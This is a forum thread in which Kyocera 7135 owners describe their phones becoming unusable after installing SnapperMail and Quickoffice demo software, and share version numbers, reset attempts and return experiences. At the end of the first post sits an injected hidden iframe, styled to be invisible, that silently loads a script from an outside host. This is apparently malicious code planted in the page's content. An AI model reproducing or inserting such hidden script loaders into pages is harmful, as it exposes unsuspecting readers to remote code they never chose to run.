+ Reply to Thread
Page 1 of 3 1 2 3 LastLast

Thread: Dead Phone!

Dead Phone!

I've been looking for an e-mail program that can sync both wirelessly and from my desktop and download attachments in their native format. I decided to check out SnapperMail (http://www.snappermail.com/palm/email), which uses the Quickoffice apps to view attachments. Quickoffice 7 can open Microsoft Office documents in their native format. In addition, SnapperMail can open many other files in their native formats. I loaded the demo software for SnapperMail and then the demo software for the Quickoffice apps. During the hot sync I received a fatal error and was forced to reset the phone. The soft reset didn't work so I tried the hard reset. Both reset methods left me with a flashing Palm Powered logo and non-responsive phone. No what?

I called Kyocera and waited on hold for an hour. Finally got through to a tech guy who walked my through the reset methods I just tried. I followed his instructions and explained what happen to cause my problem. He agreed with me, I was screwed. Kyocera said they would call me back within 4 hours, but that was 6 hours ago. I sent my phone back through Verizon and I awaiting a replacement 7135. Anyone out there have a similar experience? My recommendation is to not load the Quickoffice 7 demos!<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Go UM Terps!!

I had the same thing happen twice trying to install the snappermail program. I did not have the quickoffice programs installed. I am waiting for the 3rd phone to arrive tomorrow.
    Linda

17" powerbook OSX

Mine died and couldn't be reset after hotsync. I had SnapperMail QuickOffice and version which came w/ 7135.

I guess I wasn't the only one. I'm trying to get to the bottom of this issue. I would like to find out exactly what caused this problem. Has anyone been able to successfully install SnapperMail? Does anyone out there run Quickoffice 7 Premier?
    Go UM Terps!!

You were on hold for an hour with Kyo Tech? I've always been able to get to a tech in less than 5 minutes. This must mean that they are being overwhelmed with calls from new users. Bummer.

Anyway, to answer your question, yes I have SnapperMail and QuickOffice installed and running with no problems. I just used Snappermail a minute ago to fetch and send messages. But I'm using an older Alltell firmware 7135 and I got my Quickoffice (and Snappermail) online, not from Kyocera.

The only trouble I've had with Snappermail (and all my other mail clients for that matter) is that recently it seems like the Network setting for QNC where you have to change a "3" to a "2" spontaneously and unpredictably seems to switch back to the default "3" once in a while. And that can lead to lockups or even RSD's when I try to go online with QNC. So I've learned to doublecheck that network setting before I go online.

Jazmaan, what version of Quickoffice and SnapperMail are you running? Are they demo versions? Are you just using the Quickoffice apps that came packaged with the phone?
    Go UM Terps!!

Originally posted by jcotugno
    I guess I wasn't the only one. I'm trying to get to the bottom of this issue. I would like to find out exactly what caused this problem. Has anyone been able to successfully install SnapperMail? Does anyone out there run Quickoffice 7 Premier?
    I use both SnapperMail and QuickOffice Premier. I have had no problems at all.

p.s. My versions are Snapper 1.6.2.01 and QuickOffice Premier 7.0.32.
    Please visit my picture site: Robert-O-Rama :)

Quickword 5.6.37, Quicksheet 5.6.8
    Snappermail Trial Version 1.6.0.04

And now I recall that I already had QuickWord and Quicksheet installed before I installed Snappermail, so during the installation of Snappermail I told it not to bother installing the Quickoffice demo version.

I posted this in another thread, but I'll repost here:

I also had sync problems after the install of Snappermail. In my case, I was able to trace it to the following situation: When I first got the phone, I installed QuickOffice and its desktop off the CD, registered it, etc. Then I got the Snapper demo, including a demo of QO Premiere. I installed this, and got a crash/reset at the end of every sync. Interestingly, rather than adding the Premiere demo in addition to the registered QO, it replaced it. I eventually figured out that it was the Quicksheet conduit that was causing the crash. (When I disabled that conduit, no crash.) Apparently the new QS Premiere on the Palm didn't want to talk to the old Desktop/Conduit on the PC (a 6.something version number). When I uninstalled QO entirely, and then reinstalled with a Premiere demo from the Cutting Edge site, including a new desktop installation, everything worked fine.

I do have the Verizon software on my phone, so Snapper and QO and QO Premiere all do run properly on that software. I would be suspicious, however, about installing the Premiere demo that came with Snapper. The version from the QO site might be preferable.

My original QO versions were directly off the CD that came with the phone. I now have QW and QS Premiere 7.0.38. The Snapper demo that I had during all of this was version 1.6.0.04T. The registered version I have now is 1.6.2.01.

I think the best bet, when I get my replacement phone, is to not install the Quickoffice that comes with the phone but to purchase the Premier version and just install that. I was running Docs to Go but I think the Quickoffice suite is much better considering that I'll be able to open documents in their native formats. Then I'll get a registered copy of SnapperMail. NO MORE DEMOS!
    Go UM Terps!!

i downloaded the snappermail program from their website and installed it along with the quickoffice demo and it all seems to work good. try downloading the demo from their website. good luck.

I wish I had read this thread before installing the snappermail demo...

I think the key was that I had the Quickoffice installed from the Verizon CD and then installed the full Snappermail demo. I started having to do soft reset and the phone became very unstable in the cradle.

The last straw was an error this morning while in the cradle.. the phone will not hard or soft reset - just the "Palm Powered" logo. I have been using Palms for years (I even have a US Robotics Palm Pro that still works!) but have never had an application crash the palm so bad that it could not hard reset.

I liked the Snappermail package a lot - but I like having a working phone even better...

Does anyone out there have any ideas on methods to try to get the phone back.. I really hate to have to return it - I have only had it a week.

Did you try leaving the battery out for a while? And how long are you pushing the reset button after you pull the battery? The unit has internal power that needs to go away before it will hard reset at times. Others have mentioned taking the battery out and putting the phone in the cradle without it. Search for threads that include "hard reset" and I'm sure you'll find the answer.
    Taylor Made Web Sites and Domain Services
    Happy Kyocera 7135 User 2003-2008. Now Treo 800w.

Nope, I don't think there's is anything you can do. You're basically just screwed. Unfortunately you're going to have to send your phone back for a replacement. I don't think anyone has equipment to reset the system software. But I have some good news for you if you ordered your phone through Verizon. I sent my phone back though Verizon and got a new phone in less then 24 hours. I was very surprised. I live in the Washington, DC area.

Don't waste your time trying to solve this problem. I spent way too much time on the phone with the Kyocera techs to just find out there was nothing they could do for me then to let me know that I was SOL (sht out of luck).
    Go UM Terps!!

Keeping the battery out of the phone doesn't do anything more than a hard reset would. If you can't hard reset to the base system then your just simply screwed. I've been a palm pilot owner back when they were US Robotics devices and I never had a crash like the one I got after loading the Snapper Mail demo crap.
    Go UM Terps!!

Administrator
    are you sure you are doing the cold boot correctly? its hard to think you have 'broken' the 7135 by a simple software install..

Originally posted by marctronixx
    are you sure you are doing the cold boot correctly? its hard to think you have 'broken' the 7135 by a simple software install..
    We 7135 owners call it a hard reset :p

Yeah, I don't see how it would be possible to do anything on the RAM side that would damage the ROM, which is all that you are left with on a hard reset (aside from the db's that the ROM creates in RAM at that time). I didn't see any mention of getting the yes/no option of resetting the device after performing the hard reset. I would recommend trying it again.
    Please visit my picture site: Robert-O-Rama :)

Thanks everyone.

Yes - I have tried the hard reset (about 30 times) by holding down the backlight button and then getting the "yes/no" message.

Pulled the battery - held down the reset button - did not help.

I went in to the Verizon store near me and the tech had no clue. I will be visiting the rep that I got the phone from tomorrow and sending it back for a replacement.

-Ed-

Well this thread is a godsend. All of these things have happened to me in the last few days since doing the install of the Snappermail and the Quickoffice demos. The end result -- following a fatal exception after every sync today (even when not adding anything new) and soft resets too numerous to count -- is a $500 paperweight with a pretty palm logo on it. Neither hard nor soft resets work. I am stuck with the Palm screen only.

Wish I had seen this thread before that demo install.

Bought mine from Verizon. Their tech support was "go to the store so they can look at it." Is there a better way to get "approval" to send it back in?

Simply tell the techs a Verizon that you spoke directly to Kyocera and then informed you that the phone must be returned for a replacement. Don't wait around for a miracle; it's not going to happen.

I'm now trying to get to the bottom of this issue to find out exactly why these applications caused these problems. I've got a case with Kyocera and I've also been talking with the folks at both Cutting Edge Software and SnapperMail. I'll keep you guys all posted if I find anything out. I hope people are reading this thread and are aware that loading the demos could be fatal to your beloved phone! Although, they do make nice paper weights!:alieneyes
    Go UM Terps!!